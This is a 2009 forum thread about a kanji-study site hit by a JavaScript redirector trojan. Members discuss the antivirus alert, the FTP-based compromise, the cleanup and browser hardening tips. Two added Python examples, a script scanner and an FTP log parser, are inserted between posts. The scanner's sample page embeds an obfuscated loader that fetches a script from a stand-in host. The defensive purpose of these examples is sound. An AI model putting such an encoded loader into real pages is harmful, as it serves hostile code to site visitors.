JS:Redirector-H2 [Trj] infection, or false positive?


 
Reply #1 - 2009 May 14, 8:39 pm
Burritolingus Member
From: United States of America Inc. Registered: 2008-10-09 Posts: 216 Website

I know Avast isn't exactly the most trustworthy antivirus when it comes to such things, but...

http://i33.photobucket.com/albums/d55/nachomancer/2009-05-14_202520.jpg

Cause for concern? This alert only appeared later in the day, as of a few hours ago.

Thought I should throw this out there in case something is up! Hoping it is indeed a false positive and nothing harmful or nefarious.

Reply #2 - 2009 May 14, 9:50 pm
atylmo Member
From: USA Registered: 2008-08-05 Posts: 124

I'm pretty sure it's a false positive. I kept getting the same trojan message on another site I use but recently it stopped coming up.

I never had Avast puke on me about this site though.

Reply #3 - 2009 May 14, 11:38 pm
resolve Member
From: 山口 Registered: 2007-05-29 Posts: 919 Website

There is obfuscated javascript on the page which does indeed look suspicious:

Admin: thanks, edited out the script, there is no need to paste the whole javascript block in the post (it also triggers aVast warning)

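The obfuscated block resolve spotted is the kind of thing a quick scan of the served HTML can surface before an antivirus does. The following is an added example, not code from this thread, the site, or the antivirus vendor: a small Python scanner that pulls every `<script>` element out of a page and scores it against heuristics that encoded redirector payloads commonly trip (eval/unescape/fromCharCode, long percent-encoded or numeric strings, try/catch wrappers, split string literals, and external sources on hosts you do not own). The sample page, the `example.invalid` host and the `site_hosts` parameter are constructed for the example; the injected block is written in that style and is not the actual script that was removed from the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample page (not the script from the original thread): one benign
# inline script, one same-site external script, and one injected block written
# in the eval/unescape/fromCharCode style that browser-side redirectors used.
SAMPLE_HTML = """<html><head><title>Review</title>
<script type="text/javascript">
function toggleHelp(id) {
  var e = document.getElementById(id);
  e.style.display = (e.style.display == 'none') ? 'block' : 'none';
}
</script>
<script type="text/javascript" src="/js/review.js"></script>
</head><body>
<h1>Welcome back</h1>
<script>try{window.onload=function(){var Iw4=document.createElement('s'+'cript');
Iw4.src=unescape('%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65%2e%69%6e%76%61%6c%69%64%2f%67%2e%6a%73');
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,73,119,52,41));};}catch(e){}</script>
</body></html>"""

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

# Calls that legitimate page code rarely needs but encoded payloads nearly always do.
SUSPICIOUS_CALLS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")


def script_reasons(attrs, body, site_hosts):
    """Return the list of heuristics a single <script> element trips."""
    reasons = []
    m = SRC_RE.search(attrs)
    if m:
        host = urlparse(m.group(1)).hostname
        # Relative URLs have no host and are same-site by definition.
        if host and host not in site_hosts:
            reasons.append(f"loads script from off-site host {host}")
    for call in SUSPICIOUS_CALLS:
        if call in body:
            reasons.append(f"uses {call}")
    if re.search(r"(?:%[0-9a-fA-F]{2}){8,}", body):
        reasons.append("long percent-encoded string")
    if re.search(r"(?:\d{1,3},){10,}\d{1,3}", body):
        reasons.append("long list of numeric character codes")
    if re.search(r"try\s*\{.*\}\s*catch\s*\(", body, re.S):
        reasons.append("try/catch that silently swallows errors")
    if re.search(r"'[A-Za-z]+'\s*\+\s*'[A-Za-z]+'", body):
        reasons.append("string split by concatenation (e.g. 's'+'cript')")
    return reasons


def find_suspicious_scripts(html, site_hosts=(), min_hits=2):
    """Scan every <script> in a page; report those tripping >= min_hits heuristics.

    A single hit (say, one document.write) is common in clean code, so the
    threshold keeps the noise down; two or more together is worth a look.
    """
    findings = []
    for index, (attrs, body) in enumerate(SCRIPT_RE.findall(html)):
        reasons = script_reasons(attrs, body, site_hosts)
        if len(reasons) >= min_hits:
            findings.append({
                "index": index,
                "reasons": reasons,
                "snippet": body.strip()[:80],
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_scripts(SAMPLE_HTML, site_hosts={"www.example.invalid"}):
        print(f"script #{f['index']}: {f['snippet']}...")
        for r in f["reasons"]:
            print("   -", r)
```

Run against a saved copy of the page (`curl -s URL > page.html`) from a machine without a vulnerable browser plugin stack, not from the browser itself. The heuristics are deliberately crude: a page that legitimately minifies its scripts will score a hit or two, which is why the threshold exists, and a determined attacker can evade all of them. The point is to find injected blocks fast enough to matter.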
 
Reply #4 - 2009 May 14, 11:42 pm
resolve Member
From: 山口 Registered: 2007-05-29 Posts: 919 Website

http://blog.unmaskparasites.com/2009/05 … ed-script/

If you're using Windows and not using anti-virus software, I'd stay off the site until Fabrice fixes this. The site does appear to have been trojaned

Reply #5 - 2009 May 15, 1:04 am
Burritolingus Member
From: United States of America Inc. Registered: 2008-10-09 Posts: 216 Website

That's what I was afraid of, Resolve. I'm having to disable Avast's web shield in order to reach this site at all, so I'm hoping NoScript will block any malicious scripts (and recommend all Firefox users do the same).

Reply #6 - 2009 May 15, 9:25 am
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Thanks everyone.

I'm investigating (as of typing, the site is down).

Briefly (please check the main site news), my FTP password was quite secure, there is no particular "hole" in the site or forum that I know of, and the exploit has hit many sites recently including some much bigger ones than RevTK.

UPDATE:

Please check today's news post

I'm sorry about the trouble this may have caused and the long down time.

This stupid malware ate most of my Friday and Saturday, time which I would have gladly spent working on the upcoming update. >_<   I'll do my best to update the site next week as I had intended.

The website cleanup was tricky because my local copy was a little different. The review page code is actually slightly different, and may interfere with some Greasemonkey scripts (though that should not matter too much given that the whole site will be updated with the refactored version next week).

If you see anything buggy please report here and I'll try to fix it asap, thank you.

Reply #7 - 2009 May 16, 1:48 pm
atylmo Member
From: USA Registered: 2008-08-05 Posts: 124

Heh, looks like I was way wrong.

Reply #8 - 2009 May 16, 1:57 pm
sethg Member
From: m Registered: 2008-11-07 Posts: 505

atylmo wrote:

Heh, looks like I was way wrong.

Haha, that was my first thought when the site came back up. But hey, you were just trying to be optimistic... I was thinking the same thing.

Reply #9 - 2009 May 16, 3:39 pm
Codexus Member
From: Switzerland Registered: 2007-11-27 Posts: 721

A few security tips:

- The web would be a much safer place without Javascript and Flash but unfortunately it has become hard to avoid those completely so install the NoScript extension and only enable javascript and flash for sites that you trust and really need it. (as we have seen, even our favorite site can become infested by something but still this reduces the risks.)

- Make sure you have the latest versions of Flash and Acrobat Reader. The old versions have commonly used exploits.

- Disable the JavaScript support in Acrobat Reader. I've never seen a pdf file that used that for anything useful and almost all the latest pdf exploits can be prevented by that simple measure. I believe even the latest version is currently vulnerable if javascript is turned on.

- Disable the pdf plugin in your browser. You don't need it (just save the pdfs you really want to see) and anyway it's annoying and sometimes makes the browser crash.

- Also disable any browser plugin you don't really need and make sure those you keep are up to date.

Last edited by Codexus (2009 May 16, 3:39 pm)

Reply #10 - 2009 May 16, 4:02 pm
ueshiba Member
From: Portugal Registered: 2008-10-30 Posts: 19

Congrats on putting it up again so fast, thank you so much. On Friday during the morning my antivirus warned me of that trojan when I tried to enter the website, and it blocked it for me. I thought of going to my college public PC, so I wouldn't get my home PC infected, and posting a warning here on the forum, but when I got the chance to do it, the site was already down for maintenance.
Thank God for my G Data security center =)), it didn't allow my computer to get infected.
Again thank you for solving this so quickly, and ffs I hope those hackers get infected by someone else themselves.
loool now I have 60 expired kanji!

Last edited by ueshiba (2009 May 16, 4:03 pm)

Reply #11 - 2009 May 16, 4:06 pm
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Codexus wrote:

- Make sure you have the latest versions of Flash and Acrobat Reader. The old versions have commonly used exploits.

Yeah, I was using Adobe Reader version 7, because the newer versions had become so bloated and slow. I didn't realize Adobe's plugins could be exploited so easily by a trojan. It may have been how my PC got infected.

I don't even use it! Last time I checked version 9 still couldn't remember the last used page of recently opened documents. FoxitReader can do that.

For now I have uninstalled Adobe Reader as part of the cleanup operation.. if I have to install it again, I'll get the latest version.

Great suggestions about browser plugins.. I didn't think of simply disabling them, always annoys me when the browser opens a PDF file instead of letting the dedicated app handle it!

Reply #12 - 2009 May 16, 4:41 pm
rich_f Member
From: north carolina Registered: 2007-07-12 Posts: 1708

I never even bother to install acrobat anymore on my PCs. I just go ahead and install Foxit. It runs a heck of a lot faster, and without all of that bloat.

Advertisers won't like it, but I like Adblock Plus as well for keeping down the number of "disease" vectors. But I agree that it's hard to beat noscript for effectiveness.

Reply #13 - 2009 May 16, 4:46 pm
Transparent_Aluminium Member
From: Canada Registered: 2008-06-30 Posts: 168

I think you should warn users of this in the "Announcement" space. I'm sure a lot of people don't ever bother to scroll down the main page or check the Feedback forum.

Also, from what time till what time do you estimate the virus was live on the site?

Last edited by Transparent_Aluminium (2009 May 16, 4:46 pm)

Reply #14 - 2009 May 16, 5:29 pm
Zarxrax Member
From: North Carolina Registered: 2008-03-24 Posts: 949

Since the site has come back up, reviewing doesn't seem to work for me? Is there still a problem? I go to review, and a kanji never appears.

Reply #15 - 2009 May 16, 6:35 pm
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Zarxrax: please try again, if it doesn't work, try the Refresh button on the browser or CTRL-F5 in Windows, this should clear the cache from old javascript files.

Reply #16 - 2009 May 16, 6:58 pm
ファブリス Administrator
From: Belgium Registered: 2006-06-14 Posts: 4021 Website

Transparent_Aluminium wrote:

Also, from what time till what time do you estimate the virus was live on the site?

The script/hacker logged in to FTP and inserted the malware at around 5 PM US time Thursday. It was about midnight here in Brussels. I went to sleep, and saw Burritolingus's post only the next day in the afternoon, so it was able to run free about 16 hours. Yep, shame I'm not a zombie.

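Fabrice's account above (an FTP login with the owner's credentials, pages edited in place, roughly 16 hours before anyone noticed) is exactly what an FTP transfer log records, and reading it is how you confirm the entry point and size the exposure window. The following is an added example, not the site's real log or code from the thread: a Python parser for the standard xferlog format (wu-ftpd, proftpd, vsftpd) run over a constructed excerpt. The IP addresses, paths, username, file sizes and the assumed takedown time are all invented for the example; timestamps are treated as UTC.

```python
from datetime import datetime, timedelta

# Constructed xferlog excerpt (wu-ftpd/proftpd transfer-log format), not the
# real server log from the thread. Times are taken as UTC for this example.
# 203.0.113.7 stands in for the site owner's usual address; 198.51.100.23 is
# the unknown host that fetched, altered and re-uploaded two pages.
SAMPLE_XFERLOG = """\
Mon May 11 20:15:02 2009 2 203.0.113.7 58213 /home/site/public_html/review.php b _ i r siteowner ftp 0 * c
Mon May 11 20:15:04 2009 1 203.0.113.7 4102 /home/site/public_html/css/main.css a _ i r siteowner ftp 0 * c
Thu May 14 22:58:41 2009 1 198.51.100.23 6124 /home/site/public_html/index.php b _ o r siteowner ftp 0 * c
Thu May 14 22:58:43 2009 1 198.51.100.23 4110 /home/site/public_html/review.php b _ o r siteowner ftp 0 * c
Thu May 14 22:59:05 2009 1 198.51.100.23 7310 /home/site/public_html/index.php b _ i r siteowner ftp 0 * c
Thu May 14 22:59:09 2009 1 198.51.100.23 5296 /home/site/public_html/review.php b _ i r siteowner ftp 0 * c
"""

# xferlog fields after the 5-token timestamp, in order.
FIELDS = ("transfer_time", "remote_host", "file_size", "filename",
          "transfer_type", "special_action", "direction", "access_mode",
          "username", "service", "auth_method", "auth_user", "status")


def parse_xferlog(text):
    """Parse xferlog lines into dicts; 'direction' is 'i' (upload) or 'o' (download)."""
    records = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 5 + len(FIELDS):
            continue  # truncated or foreign line; skip rather than guess
        when = datetime.strptime(" ".join(tokens[:5]), "%a %b %d %H:%M:%S %Y")
        rec = dict(zip(FIELDS, tokens[5:5 + len(FIELDS)]))
        rec["time"] = when
        rec["file_size"] = int(rec["file_size"])
        records.append(rec)
    return records


def uploads_from_unknown_hosts(records, trusted_hosts):
    """Completed uploads ('i', status 'c') by hosts outside the owner's usual set."""
    return [r for r in records
            if r["direction"] == "i" and r["status"] == "c"
            and r["remote_host"] not in trusted_hosts]


def fetch_modify_reupload(records, window=timedelta(minutes=5)):
    """Download followed by upload of the same file from the same host within `window`.

    That sequence is how a credential-stealing injector edits pages in place:
    it pulls the existing file, appends its script, and pushes it back."""
    pairs = []
    downloads = [r for r in records if r["direction"] == "o"]
    for up in records:
        if up["direction"] != "i":
            continue
        for down in downloads:
            same = (down["remote_host"] == up["remote_host"]
                    and down["filename"] == up["filename"])
            if same and timedelta(0) <= up["time"] - down["time"] <= window:
                pairs.append((down, up))
                break
    return pairs


def exposure_hours(records, cleanup_time):
    """Hours between the first suspicious upload and the moment the site was taken down."""
    first = min(r["time"] for r in records)
    return (cleanup_time - first).total_seconds() / 3600


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    bad = uploads_from_unknown_hosts(recs, trusted_hosts={"203.0.113.7"})
    for r in bad:
        print(f"{r['time']:%Y-%m-%d %H:%M:%S} {r['remote_host']} uploaded {r['filename']}")
    for down, up in fetch_modify_reupload(recs):
        print(f"{up['filename']}: {down['file_size']} -> {up['file_size']} bytes "
              f"({up['file_size'] - down['file_size']:+d}), host {up['remote_host']}")
    # Assumed takedown time for the example; the thread gives only "about 16 hours".
    print(f"exposed for {exposure_hours(bad, datetime(2009, 5, 15, 15, 0, 0)):.1f} h")
```

Two things the output gives you that the antivirus alert does not: the list of every file the intruder touched (cleanup has to cover all of them, not just the page that tripped Avast), and the fact that each re-upload grew by the same number of bytes, which is a good sign that one payload was appended rather than the files being rewritten wholesale. Since the uploads used the owner's own username and a valid password, the log also tells you the credential itself is burned: rotate it, and check the machine it was typed on, before putting the cleaned site back.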
Reply #17 - 2009 May 16, 7:50 pm
squeaky_lill_mk Member
From: Germany Registered: 2009-03-23 Posts: 18

Thanks ファブリス, you are doing a great job! I'm so glad that the site is back up again!

Reply #18 - 2009 May 16, 8:20 pm
Evil_Dragon Member
From: Germany Registered: 2008-08-21 Posts: 683

ファブリス wrote:

Zarxrax: please try again, if it doesn't work, try the Refresh button on the browser or CTRL-F5 in Windows, this should clear the cache from old javascript files.

Did not work for me (using Firefox). It does work in IE.. but without Greasemonkey.

Reply #19 - 2009 May 16, 8:23 pm
markal Member
From: Tokyo Registered: 2007-10-22 Posts: 84

It seems to be an issue with the substitute kanji script. Turn it off and the page loads normally. The substitute font script works OK.

Reply #20 - 2009 May 17, 1:12 am
Evil_Dragon Member
From: Germany Registered: 2008-08-21 Posts: 683

Substitute Keywords for me.. tried to review in English, but to no avail. I guess it will be no reviews at all for at least a week. Thanks to whoever is responsible...
He probably does not know the horrors of having to review 500+ Kanji.

Reply #21 - 2009 May 17, 1:38 am
woelpad Member
From: Chiba Registered: 2006-11-07 Posts: 425

Fixed it. Affected scripts were Substitute keywords and Alter sequence.

ファブリス wrote:

The website cleanup was tricky because my local copy was a little different. The review page code is actually slightly different, and may interfere with some Greasemonkey scripts (though that should not matter too much given that the whole site will be updated with the refactored version next week).

We have a date! I'm aware that the update might make large parts of above scripts obsolete, still a week is a lot of reviews. Can't let the customers lose faith.

Reply #22 - 2009 May 17, 1:49 am
Thora Member
From: Canada Registered: 2007-02-23 Posts: 1691

Deep curtsy to Fabrice and Woelpad.

Reply #23 - 2009 May 17, 4:39 am
aiken Member
From: Cardiff Registered: 2009-01-03 Posts: 11

I have the same problem as Evil_Dragon, does this mean I just have to wait now and it will be fixed in a few days?

Reply #24 - 2009 May 17, 6:13 am
woelpad Member
From: Chiba Registered: 2006-11-07 Posts: 425

No, you follow the link(s) I gave in the previous message and press the Install button.

Reply #25 - 2009 May 17, 7:56 am
aiken Member
From: Cardiff Registered: 2009-01-03 Posts: 11

thanks! works again. I feel stupid now but thanks for having patience with slow people like me ^^;